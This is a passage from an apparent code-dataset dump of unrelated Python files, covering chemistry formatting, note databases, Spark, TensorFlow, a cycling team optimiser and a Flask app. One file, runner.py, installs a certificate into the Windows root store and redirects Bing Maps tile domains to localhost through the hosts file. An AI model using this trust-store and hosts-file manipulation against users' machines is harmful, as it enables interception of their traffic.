get_env_variable('MAPBOX_ACCESS_TOKEN')\n","sub_path":"pepysdiary/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"513303421","text":"class MoleculePrettyPrinter():\n def __init__(self):\n pass \n\n def pretty_print_molecule(self, compound):\n compoundList = []\n splitIndice = []\n result = []\n for i in range(0, len(compound) - 1):\n if (compound[i].isdigit() and not compound[i + 1].isdigit()):\n splitIndice.append(i + 1)\n elif (not compound[i].isdigit() and compound[i + 1].isdigit()):\n splitIndice.append(i + 1)\n splitIndice.insert(0, 0)\n splitIndice.insert(len(splitIndice), len(compound))\n for i in range(0, len(splitIndice) - 1):\n compoundList.append(compound[splitIndice[i] : splitIndice[i + 1]])\n for element in compoundList:\n newElement = element\n if element.isdigit():\n newElement = \"_{\" + element + \"}\"\n result.append(newElement)\n return \"${}$\".format(\"\".join(result))\n","sub_path":"workspace/lineplot/MoleculePrettyPlotPrinter.py","file_name":"MoleculePrettyPlotPrinter.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"253184373","text":"import atexit\nfrom python_hosts import Hosts, HostsEntry\nimport subprocess\n\nimport urllib3\nfrom python_hosts import Hosts, HostsEntry\n\nurllib3.disable_warnings()\n\n\ndef add_cert():\n subprocess.run([\"certutil\", \"-addstore\", \"-f\", \"root\",\n \".\\certs\\cert.crt\"], shell=True, check=True)\n\nmy_hosts = Hosts()\ndomains = ['kh.ssl.ak.tiles.virtualearth.net', 'khstorelive.azureedge.net']\n\n# origin_ips = {}\n# dns_resolver = dns.resolver.Resolver()\n# dns_resolver.nameservers = ['8.8.8.8']\n# for d in domains:\n# origin_ips[d] = dns_resolver.query(d)[0].to_text()\n\ndef override_hosts():\n for domain in domains:\n my_hosts.remove_all_matching(name=domain)\n new_entry = HostsEntry(\n entry_type='ipv4', address='127.0.0.1', names=[domain])\n my_hosts.add([new_entry])\n my_hosts.write()\n\ndef restore_hosts():\n for domain in domains:\n my_hosts.remove_all_matching(name=domain)\n my_hosts.write()","sub_path":"src/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"401724483","text":"\"\"\"Sqlite database wrapper.\"\"\"\n\nfrom itertools import chain\nfrom pathlib import Path\nfrom time import time\nfrom typing import Iterable, List, Tuple\n\nfrom . import scan, page\nfrom .initializer import DotSlipbox\n\nclass Slipbox:\n \"\"\"Slipbox main functions.\"\"\"\n def __init__(self, dot: DotSlipbox):\n self.conn = dot.database()\n self.dot = dot\n self.config = dot.config\n\n @property\n def basedir(self) -> Path:\n \"\"\"Return base directory regardless of current working directory.\"\"\"\n return self.dot.parent\n\n @property\n def timestamp(self) -> float:\n \"\"\"Get timestamp from Meta table.\"\"\"\n cur = self.conn.cursor()\n cur.execute(\"SELECT * FROM Meta WHERE key = 'timestamp'\")\n _, value = cur.fetchone()\n return value\n\n @timestamp.setter\n def timestamp(self, value: float) -> None:\n \"\"\"Set timestamp in Meta table.\"\"\"\n self.conn.execute(\"UPDATE Meta SET value = ? WHERE key = 'timestamp'\", (value,))\n self.conn.commit()\n\n def close(self) -> None:\n \"\"\"Close database connection.\"\"\"\n self.conn.close()\n\n def __enter__(self) -> \"Slipbox\":\n return self\n\n def __exit__(self, exc_type, exc_value, traceback) -> None: # type: ignore\n self.close()\n\n def find_new_notes(self) -> Iterable[Path]:\n \"\"\"Yield files that are not yet in the database.\"\"\"\n patterns = self.dot.patterns\n for path in self.basedir.rglob('*'):\n if path.is_file() and scan.has_valid_pattern(path, patterns) \\\n and not scan.is_file_in_db(path.relative_to(self.basedir), self.conn):\n yield path\n\n def purge(self) -> Tuple[List[Path], List[Path]]:\n \"\"\"Purge outdated/missing files from database.\n\n Also delete old sections.\n \"\"\"\n modified = []\n deleted = []\n sql = \"SELECT filename FROM Files\"\n timestamp = self.timestamp\n cur = self.conn.cursor()\n cur.execute(\"PRAGMA foreign_keys=ON\")\n for filename, in cur.execute(sql):\n path = self.basedir/filename\n if not path.exists():\n deleted.append(filename)\n elif scan.is_recently_modified(timestamp, path):\n modified.append(filename)\n cur.executemany(\"DELETE FROM Files WHERE filename IN (?)\",\n ((filename,) for filename in chain(modified, deleted)))\n\n # Delete unused html content\n cur.execute(\"DELETE FROM Html WHERE id NOT IN (SELECT html FROM Sections)\")\n self.conn.commit()\n return modified, deleted\n\n def process(self, paths: Iterable[Path]) -> None:\n \"\"\"Process input files.\"\"\"\n inputs = list(set(paths))\n for batch in scan.group_by_file_extension(inputs):\n scan.process_batch(self.conn, list(batch), self.config, self.basedir)\n self.timestamp = time()\n\n def compile(self) -> None:\n \"\"\"Compile processed HTML into final output.\"\"\"\n options = self.config.get(\"slipbox\", \"document_options\")\n page.generate_complete_html(self.conn, options, self.basedir)\n\n def run(self) -> None:\n \"\"\"Run all steps needed to compile output.\"\"\"\n self.purge()\n notes = self.find_new_notes()\n self.process(notes)\n self.compile()\n","sub_path":"cli/slipbox/slipbox.py","file_name":"slipbox.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"571494104","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nfrom pyspark import SparkContext, SparkConf\nfrom operator import add\nconf = SparkConf()\\\n.setAppName(\"wordcount_demo\")\nsc = SparkContext(conf=conf)\nlines = sc.textFile(\"/data/data.log\")\nwords = lines.flatMap(lambda line: line.split(','))\npairs = words.map(lambda word: (word, 1))\nwordCounts = pairs.reduceByKey(add)\noutput = wordCounts.collect()\nfor (word, count) in output:\n print (\"%s: %i\\n\" % (word, count))\nsc.stop()","sub_path":"2017-5/spark00/wordcount/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360645153","text":"# Copyright 2018 The TensorFlow Probability Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"Functions for computing gradients.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nimport tensorflow as tf\n\n\n__all__ = [\n 'value_and_gradient',\n]\n\n\ndef value_and_gradient(f, xs, watch_accessed_variables=True, name=None):\n \"\"\"Computes `f(*xs)` and its gradients wrt to `*xs`.\n\n Args:\n f: Python `callable` to be differentiated. If `f` returns a scalar, this\n scalar will be differentiated. If `f` returns a tensor or list of tensors,\n by default a scalar will be computed by adding all their values to produce\n a single scalar. If desired, the tensors can be elementwise multiplied by\n the tensors passed as the `dy` keyword argument to the returned gradient\n function.\n xs: Python list of parameters of f for which to differentiate. (Can also\n be single `Tensor`.)\n watch_accessed_variables: Boolean controlling whether the tape will\n automatically `watch` any (trainable) variables accessed while the tape is\n active. Defaults to True meaning gradients can be requested from any\n result computed in the tape derived from reading a trainable `Variable`.\n If False users must explicitly `watch` any `Variable`s they want to\n request gradients from.\n Default value: `True`.\n name: Python `str` name prefixed to ops created by this function.\n Default value: `None` (i.e., `'value_and_gradient'`).\n\n Returns:\n y: `y = f(*xs)`.\n dydx: Gradient of `y` wrt each of `xs`.\n \"\"\"\n with tf.name_scope(name, 'value_and_gradient', [xs]):\n is_xs_list_like = isinstance(xs, (tuple, list))\n if not is_xs_list_like:\n xs = [xs]\n xs = [tf.convert_to_tensor(value=x, name='x{}'.format(i))\n for i, x in enumerate(xs)]\n with tf.GradientTape(\n persistent=len(xs) > 1,\n watch_accessed_variables=watch_accessed_variables) as tape:\n for x in xs:\n tape.watch(x)\n y = tf.convert_to_tensor(value=f(*xs), name='y')\n dydx = [tape.gradient(y, x) for x in xs]\n if not is_xs_list_like:\n dydx = dydx[0]\n return y, dydx\n","sub_path":"tensorflow_probability/python/math/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616953048","text":"def strRev(string) :\n chars = list()\n n = 0\n output = str()\n\n for i in string :\n chars.append(i)\n\n n = len(chars) - 1\n\n while n >= 0 :\n output = output + chars[n]\n n -= 1\n\n return output\n\ntest = str(input(\"Enter a string: \"))\nprint(\"The reversed string is: \" + strRev(test))","sub_path":"String/String-Reverse/Str-Rev-Function.py","file_name":"Str-Rev-Function.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104901231","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 06 10:49:55 2018\n\n@author: sjoer_000\n\"\"\"\nimport os\n\nimport pandas as pd\nimport pulp\n#%%\nINPUT_FOLDER = os.path.join(os.path.dirname(__file__), 'Data')\nOUTPUT_FOLDER = os.path.join(os.path.dirname(__file__), 'Output')\n\nJAAR = 2018\nDF_PREDICTIONS = pd.read_csv(os.path.join(INPUT_FOLDER, 'prediction_{jaar}.csv'))\n#%%\ndef bepaal_team(df_prediction, max_kosten, aantal_renners):\n '''\n Selects the team with the highest predicted score with constraints\n\n Uses linear programming. Selects riders based on\n df_prediction: contains riders, costs (in column 'Waarde') and predicted score\n ('prediction')\n max_kosten: maximum the riders can cost tomorrow\n aantal_renners: the exact number of riders that a team should contain\n '''\n\n prob = pulp.LpProblem('Rijderselectie', pulp.LpMaximize)\n\n riders = df_prediction['Rider'].values.tolist()\n kosten_dict = df_prediction.set_index('Rider').to_dict()['Waarde']\n punten_dict = df_prediction.set_index('Rider').to_dict()['prediction']\n\n # Rijder kan 0 of 1 x in selectie zitten\n rijder_geselecteerd = pulp.LpVariable.dict('Rider', riders, 0, 1, 'Integer')\n \n \n # Optimize for predicted points\n prob += pulp.lpSum([rijder_geselecteerd[i] * punten_dict[i] for i in riders]), 'Totaal aantal punten'\n \n prob += pulp.lpSum([rijder_geselecteerd[i] for i in riders]) == aantal_renners, 'Precies aantal renners in ploeg'\n prob += pulp.lpSum([rijder_geselecteerd[i] * kosten_dict[i] for i in riders]) <= max_kosten, 'Renners kosten samen niet meer dan max'\n\n prob.writeLP(\"Wielrenselectie.lp\")\n prob.solve()\n\n assert pulp.LpStatus[prob.status] == 'Optimal', 'Optimization failed!'\n\n chosen_riders = df_prediction[[bool(v.varValue) for v in prob.variables()]]\n return chosen_riders\n#%%\nMAX_KOSTEN_PER_JAAR = {2018: 150, 2017:100, 2016: 125}\nSELECTION = bepaal_team(MAX_KOSTEN_PER_JAAR[JAAR], 15, DF_PREDICTIONS)\n\nprint(SELECTION[['BIB', 'Rider']])\nprint(f'Aantal renners: {len(SELECTION)}')\nprint(f'Tot kosten: {SELECTION[\"Waarde\"].sum()}')\nprint(f'Verwachte score: {SELECTION[\"prediction\"].sum()}')\n#%%\nSELECTION.to_excel(os.path.join(OUTPUT_FOLDER, f'team_{JAAR}.xlsx'), index=False)\n","sub_path":"selecteerteam.py","file_name":"selecteerteam.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87023955","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2009 Tiny SPRL (). All Rights Reserved\n# $Id$\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\n\"\"\"adds a compute product_qty about prodlot_product_uom\"\"\"\n\nfrom osv import osv\n\nclass stock_report_prodlots(osv.osv):\n \"\"\"adds a compute product_qty with prodlot.product_uom\"\"\"\n _inherit = \"stock.report.prodlots\"\n\n def read(self,cr, uid, ids, fields=None, context=None, load='_classic_read'):\n \"\"\"overwrites read method to compute product qty with product uom in prodlot\"\"\"\n result = super(stock_report_prodlots, self).read(cr, uid, ids, fields, context, load)\n for res in result:\n if res.get('prodlot_id', False) and res.get('name', False):\n res['name'] = float(res['name']) * float(self.pool.get('stock.production.lot').browse(cr, uid, res['prodlot_id'][0]).product_uom.factor)\n return result\n\nstock_report_prodlots()","sub_path":"addons-community/pxgo_production_lot_valued/stock_report_prodlots.py","file_name":"stock_report_prodlots.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29161452","text":"\"\"\"\n.. module:: Paths\n\nPaths\n*************\n\n:Description: Paths\n\nPaths de Minotauro para P50\n\n:Authors: HPAI-BSC\n\n:Version:\n\n:Created on: 15/06/2017 11:15\n\n\"\"\"\n\n__author__ = 'HPAI-BSC'\n\nwind_path = 'E:/Wind/' # en principio este path no vale para mino\n# wind_data = '/home/HPAI-BSC/storage/Data/Wind/files/'\n\nwind_data_path = 'E:/data_turbines/' #TODAS las turbinas en .npy\n\nwind_res_path = 'E:/Wind$JM/Res/' # directorios para dejar resultado\nwind_jobs_path = 'E:/Wind$JM/Jobs/' # directorios para almacenar jobs\n\njobs_code_path = 'E:/Wind' # path al codigo\njobs_root_path = 'E:/Wind$JM' # Arbol Res/Jobs/Run\n\n# los siguientes en Minotauro no se utilizan\n\nwind_NREL_data_path = 'E:/data_turbines/'\nremote_wind_data_path = 'E:/data_turbines/transformed/'\nremote_data = 'E:/data_turbines/transformed/'\n\n\n# Dummies\n\nwind_data_ext = 'E:/dummy/'\nbsc_path = 'E:/dummy/'\nwind_models_path = 'E:/dummy/'","sub_path":"Wind/Config/PathsExP50.py","file_name":"PathsExP50.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"473320330","text":"from . import bpapp\r\nfrom datetime import datetime, timedelta\r\nfrom ercc.models import (\r\n Model,\r\n Entity,\r\n Project,\r\n # GlossaryBase,\r\n ProjectUser,\r\n # ModelHistory,\r\n SubjectArea,\r\n SubjectTree,\r\n)\r\nfrom ercc.ercc_bps.model_mgmt.forms import (\r\n DbmsTypeSettingForm,\r\n ModelBasicForm,\r\n)\r\nfrom flask_login import current_user\r\nfrom flask import request, render_template, jsonify, abort, redirect, url_for, g\r\nfrom flask_breadcrumbs import register_breadcrumb, default_breadcrumb_root\r\nfrom collections import namedtuple\r\nfrom flask_babel import lazy_gettext\r\nfrom ercc.ercc_bps.erc.ercDataModel import ercDataModel\r\n# from ercc.ercc_bps.schema.models import SchemaCollector\r\nfrom bson.json_util import dumps\r\nfrom bson.objectid import ObjectId\r\nfrom ercc.utils.portlet import Portlet\r\nfrom ercc.utils import (\r\n flash_success,\r\n flash_error,\r\n flash_warning,\r\n # flash_info,\r\n)\r\n\r\n# import difflib\r\n\r\n\r\ndefault_breadcrumb_root(bpapp, '.')\r\n\r\n\r\n@bpapp.route('/p//m_pref', methods=['GET'])\r\n@bpapp.route('/p//m_pref/', methods=['GET'])\r\n@register_breadcrumb(bpapp, '.model_mgmt', lazy_gettext(u'모델 관리'))\r\ndef model_mgmt(project_id, tab=None):\r\n # project = Project.objects.get_or_404(id=project_id)\r\n # return render_template('model_mgmt/model_mgmt.html', project=project, tab=tab)\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='model_mgmt',\r\n portlets=[\r\n Portlet('model_mgmt._model_property', project_id=project_id)\r\n ],\r\n )\r\n\r\n\r\n@bpapp.route('/p//m_prefp', methods=['GET', 'POST'])\r\ndef _model_property(project_id):\r\n # from ercc.models import SubjectTree\r\n project = Project.objects.get_or_404(id=project_id)\r\n project_user = ProjectUser.objects(project=project, user=current_user._get_current_object()).get_or_404()\r\n # stree = SubjectTree.head_objects(prjId=str(project.id)).first()\r\n\r\n # if stree:\r\n # models_in_stree = [ObjectId(d['Oid']) for d in stree.modelOrder]\r\n # else:\r\n # models_in_stree = []\r\n\r\n if not (project_user.is_modeler or project_user.is_owner):\r\n abort(400)\r\n\r\n if request.method == 'POST':\r\n form = DbmsTypeSettingForm(request.form, project_id=project_id)\r\n if form.validate():\r\n model = form.model.data\r\n model.dbmsType = form.dbms_type.data\r\n if 'notation' in model and model.notation == 'universalc' and \\\r\n form.erd_notation_type.data != 'universalc':\r\n return jsonify(result='fail',\r\n message=lazy_gettext(u'Universal-C표기법은 설정 이후 변경이 불가능합니다.'))\r\n else:\r\n model.notation = form.erd_notation_type.data\r\n\r\n if project.project_group.use_glossary_master:\r\n glossary_master = project.project_group.glossary_master\r\n glossary_derived = project.queryset_glossary(glossary_master=glossary_master).first()\r\n if not form.glossary.data or form.glossary.data != glossary_derived:\r\n return jsonify(\r\n result='fail',\r\n message=lazy_gettext('반드시 전사용어사전을 사용해야 합니다.'))\r\n\r\n if form.glossary.data:\r\n model.glossaryId = form.glossary.data.id\r\n else:\r\n model.glossaryId = None\r\n if form.schema_collector.data:\r\n model.schema_collector_id = form.schema_collector.data.id\r\n else:\r\n model.schema_collector_id = None\r\n model.save()\r\n\r\n from ercc.signals import on_created_model\r\n on_created_model.send(model)\r\n\r\n return jsonify(result='ok')\r\n return jsonify(result='fail', message=form.errors)\r\n\r\n models = Model.head_objects.filter(prjId=project_id).order_by('name')\r\n Formdata = namedtuple(\"DbmsTypeSettingForm\",\r\n \"model dbms_type erd_notation_type glossary schema_collector\")\r\n forms = []\r\n for model in models:\r\n if project_user.can_manage_all_models or model.root_object in project_user.manageable_models:\r\n pass\r\n else:\r\n continue\r\n\r\n temporary_form = Formdata(\r\n model=model,\r\n dbms_type=getattr(model, 'dbmsType', ''), # 'oracle'),\r\n erd_notation_type=getattr(model, 'notation', 'ie'),\r\n glossary=model.glossary,\r\n schema_collector=model.schema_collector,\r\n )\r\n form = DbmsTypeSettingForm(obj=temporary_form, project_id=project_id)\r\n forms.append(form)\r\n return render_template(\r\n 'model_mgmt/_model_property.html',\r\n project_user=project_user,\r\n project=project,\r\n forms=forms)\r\n\r\n\r\n@bpapp.route('/m//_tools', methods=['GET', 'POST'])\r\ndef _model_tools(model_id):\r\n model = Model.objects.get_or_404(id=model_id)\r\n # subjects = [\r\n # SubjectArea.objects(id=subject['id']).first()\r\n # for subject in model.subjectareas\r\n # ]\r\n # subjects = [\r\n # subject.head_object\r\n # for subject in subjects\r\n # if subject\r\n # ]\r\n if request.method == 'POST':\r\n form = ModelBasicForm(request.form)\r\n # form.populate_obj(model)\r\n model.name = form.name.data\r\n model.subjectareaTree = model.reorg_subjecttree()\r\n model.save()\r\n\r\n if form.change_owner_all.data:\r\n updated_cnt = g.model.reset_all_entities_dbowner(form.change_owner_name.data)\r\n flash_success(f'{updated_cnt}건의 엔터티 dbowner정보가 변경되었습니다.')\r\n\r\n flash_success('성공적으로 저장되었습니다!')\r\n else:\r\n form = ModelBasicForm(obj=model)\r\n\r\n return render_template(\r\n 'model_mgmt/_model_tools.htm.j2',\r\n model=model,\r\n form=form)\r\n\r\n\r\n@bpapp.route('/m//_lock', methods=['GET'])\r\ndef _model_lock(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n result = ercDataModel.get_lock(model.prjId, current_user.id, None,\r\n 'Model', model.id, None)\r\n if result:\r\n flash_success('locked success!')\r\n else:\r\n flash_warning('locked failed!')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_unlock', methods=['GET'])\r\ndef _model_unlock(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n result = ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model.id, None)\r\n if result['result'] == 'Y':\r\n flash_success('unlocked success!')\r\n else:\r\n flash_warning('unlocked failed!')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_clean', methods=['GET'])\r\ndef _model_clean(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n en_list = model.clean_orphan_entities()\r\n if en_list:\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n flash_success('고아앤터티 정리 성공하였습니다.')\r\n else:\r\n flash_warning('정리할 앤터티가 없습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_clean_relations', methods=['GET'])\r\ndef _model_relations_clean(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n relations = model.clean_orphan_relations()\r\n if relations:\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n flash_success('미사용관계를 정리하였습니다.')\r\n else:\r\n flash_warning('정리할 관계가 없습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_reorg_subjectareaTree', methods=['GET'])\r\ndef _model_reorg_subjectareaTree(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n model.fix_old_subjectareas(commit=True)\r\n flash_success('주제영역트리를 재정리하였습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_set_to_skipped_attr', methods=['GET'])\r\ndef _model_set_to_skipped_attr(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n model.set_to_skipped_attr()\r\n flash_success('모델의 비표준속성들을 예외처리하였습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_archive', methods=['GET'])\r\ndef _model_archive(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n if model.update(newest='D') > 0:\r\n # delete to subjecttree\r\n # st = SubjectTree.head_objects.get_or_404(prjId=model.prjId)\r\n # st.modelOrder.remove(dict(id=str(model.id), Oid=str(model.Oid)))\r\n # st.save()\r\n\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n flash_success('archived success!')\r\n else:\r\n flash_warning('archived failed!')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_subject_delete/', methods=['POST', 'GET'])\r\ndef _subject_delete(model_id, subject_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n subject = SubjectArea.head_objects.get_or_404(id=subject_id)\r\n if subject:\r\n subject.update(newest='D')\r\n model.subjectareas.remove({'id': str(subject.id), 'Oid': str(subject.Oid)})\r\n model.reorg_subjecttree()\r\n model.save_upgrade_version()\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n model = Model.newest_model(model_id)\r\n flash_success('주제영역이 삭제되었습니다.')\r\n else:\r\n flash_error('주제영역을 찾을 수 없습니다.')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/m//_subject_clone', methods=['POST', 'GET'])\r\n@bpapp.route('/m//_subject_clone/', methods=['POST', 'GET'])\r\ndef _subject_clone(model_id, subject_id=None):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n if model.is_locked:\r\n if subject_id:\r\n subject = SubjectArea.objects.get_or_404(id=subject_id)\r\n else:\r\n clone_to = request.form.get('clone_to')\r\n if clone_to:\r\n subject = SubjectArea.objects.get_or_404(id=clone_to)\r\n else:\r\n subject = None\r\n if subject:\r\n subject.clone(to=model)\r\n if subject.id != subject_id:\r\n ercDataModel.release_lock(model.prjId, current_user.id,\r\n 'Model', model_id, None)\r\n model = model.head_object\r\n flash_success('clone success!')\r\n else:\r\n flash_warning('clone failed!')\r\n else:\r\n flash_error('모델은 잠금상태에서만 ACTION 가능합니다.')\r\n return redirect(url_for('model_mgmt._model_tools', model_id=model.id))\r\n\r\n\r\n@bpapp.route('/p//_new_model', methods=['GET'])\r\ndef _model_create(project_id):\r\n sa = SubjectArea(\r\n name='__new_erd__',\r\n prjId=str(project_id),\r\n zoomLevel=20,\r\n width=1500,\r\n height=1500,\r\n entities=[],\r\n relations=[],\r\n version=1,\r\n # modified=datetime.now(),\r\n # modifiedBy=current_user.id,\r\n # created=datetime.now(),\r\n # createdBy=current_user.id,\r\n newest='Y').save()\r\n sa.update(Oid=sa.id)\r\n sa.reload()\r\n model_name = '__new_model__'\r\n model = Model(\r\n name=model_name,\r\n prjId=str(project_id),\r\n newest='Y',\r\n version=1,\r\n # modified=datetime.now(),\r\n # modifiedBy=current_user.id,\r\n # created=datetime.now(),\r\n # createdBy=current_user.id,\r\n subjectareas=[dict(id=sa.id, Oid=sa.Oid)],\r\n relations=[],\r\n entities=[],\r\n )\r\n if g.project.project_group.use_glossary_master:\r\n gm = g.project.project_group.glossary_master\r\n gd = g.project.queryset_glossary(glossary_master=gm).first()\r\n if gd:\r\n model.glossaryId = gd.id\r\n model.save()\r\n model.update(Oid=model.id)\r\n model.reload()\r\n # model.subjectareaTree = model.reorg_subjecttree()\r\n # model.save()\r\n # model.reload()\r\n\r\n from ercc.signals import on_created_model\r\n on_created_model.send(model)\r\n\r\n # add to subjecttree\r\n st = SubjectTree.head_objects.get_or_404(prjId=project_id)\r\n print('ssss', st.id)\r\n st.modelOrder.append(dict(id=str(model.id), Oid=str(model.Oid)))\r\n st.save()\r\n\r\n flash_success('새로운 데이터 모델이 생성되었습니다.')\r\n return redirect(url_for('._model_property', project_id=project_id))\r\n\r\n\r\n@bpapp.route('/m//_model_clone', methods=['GET'])\r\ndef _model_clone(model_id):\r\n model = Model.objects.get_or_404(id=model_id)\r\n model.clone()\r\n\r\n # add to subjecttree\r\n st = SubjectTree.head_objects.get_or_404(prjId=model.prjId)\r\n st.modelOrder.append(dict(id=str(model.id), Oid=str(model.Oid)))\r\n st.save()\r\n\r\n if model.id != model_id:\r\n flash_success('모델 복제가 성공적으로 수행되었습니다!')\r\n else:\r\n flash_warning('죄송합니다. 모델 복제가 실패했습니다.')\r\n return redirect(url_for('model_mgmt._model_property', project_id=model.prjId))\r\n\r\n\r\n@bpapp.route('/m//_history', methods=['GET'])\r\ndef _model_history(model_id):\r\n\r\n diff_a_id = request.args.get('diff_a')\r\n diff_b_id = request.args.get('diff_b')\r\n added = None\r\n deleted = None\r\n changed = None\r\n if diff_a_id and diff_b_id:\r\n diff_a = Model.objects(id=diff_a_id).first()\r\n diff_b = Model.objects(id=diff_b_id).first()\r\n if diff_a and diff_b:\r\n if diff_a.version < diff_b.version:\r\n diff_a, diff_b = diff_b, diff_a\r\n # diff = difflib.HtmlDiff()\r\n # diff_table = diff.make_table(\r\n # sorted([f'{e.entNm}' for e in diff_b.queryset_entity]),\r\n # sorted([f'{e.entNm}' for e in diff_a.queryset_entity]),\r\n # fromdesc=f'version-{diff_b.version}',\r\n # todesc=f'version-{diff_a.version}',\r\n # context=True,\r\n # numlines=0,\r\n # )\r\n diff_a_entities = list(diff_a.queryset_entity.all())\r\n diff_b_entities = list(diff_b.queryset_entity.all())\r\n\r\n # oid로 비교해야 added/deleted를 판단할 수 있다.\r\n added = [\r\n e\r\n for e in diff_b_entities if e.Oid in (\r\n set(e.Oid for e in diff_b_entities) - set(e.Oid for e in diff_a_entities)\r\n )\r\n ]\r\n deleted = [\r\n e\r\n for e in diff_a_entities if e.Oid in (\r\n set(e.Oid for e in diff_a_entities) - set(e.Oid for e in diff_b_entities)\r\n )\r\n ]\r\n\r\n # oid는 같은데 id가 다른 것은 changed\r\n same = set(e.Oid for e in diff_a_entities) & set(e.Oid for e in diff_b_entities)\r\n diff_a_entities = {e.Oid: e for e in diff_a_entities if e.Oid in same}\r\n diff_b_entities = {e.Oid: e for e in diff_b_entities if e.Oid in same}\r\n\r\n # 교집합에서 Oid는 같은데 id가 다른 것만 추출\r\n changed = [\r\n (diff_b_entities[oid], diff_a_entities[oid])\r\n for oid in same\r\n if diff_a_entities[oid].id != diff_b_entities[oid].id\r\n ]\r\n else:\r\n diff_a, diff_b = None, None\r\n\r\n return render_template(\r\n 'model_mgmt/_model_history.htm.j2',\r\n model=g.model,\r\n diff=(added, deleted, changed),\r\n diff_a=diff_a,\r\n diff_b=diff_b,\r\n project=g.model.project,\r\n )\r\n\r\n\r\n@bpapp.route('/m//_detail', methods=['GET'])\r\ndef _model_detail(model_id):\r\n\r\n model = Model.objects.get_or_404(id=model_id)\r\n model_props = [k for k in dir(model) if not k.startswith('_')]\r\n return render_template(\r\n 'model_mgmt/_model_detail.htm.j2',\r\n model=model, 